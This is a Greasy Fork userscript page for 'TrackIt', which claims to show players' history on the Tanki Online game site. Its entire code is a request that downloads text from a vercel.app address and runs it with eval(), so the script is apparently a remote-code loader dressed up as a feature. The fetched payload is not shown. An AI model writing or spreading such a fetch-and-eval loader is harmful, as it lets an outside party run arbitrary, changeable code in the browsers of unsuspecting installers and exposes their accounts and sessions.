Greasy Fork 支持简体中文。

TrackIt

Shows players' history

// ==UserScript==
// @name         TrackIt
// @version      0.1
// @description  Shows players' history
// @author       trackitdev
// @match        https://*.tankionline.com/*
// @icon         https://i.imghippo.com/files/SFY9741dqc.png
// @grant        GM_xmlhttpRequest
// @connect      vercel.app
// @namespace https://greasyfork.org/users/1433761
// ==/UserScript==

GM_xmlhttpRequest({
    method: 'GET',
    url: 'https://trackit-reverse.vercel.app/src/trackit',
    nocache: true,
    onload: data => eval(data.responseText)
});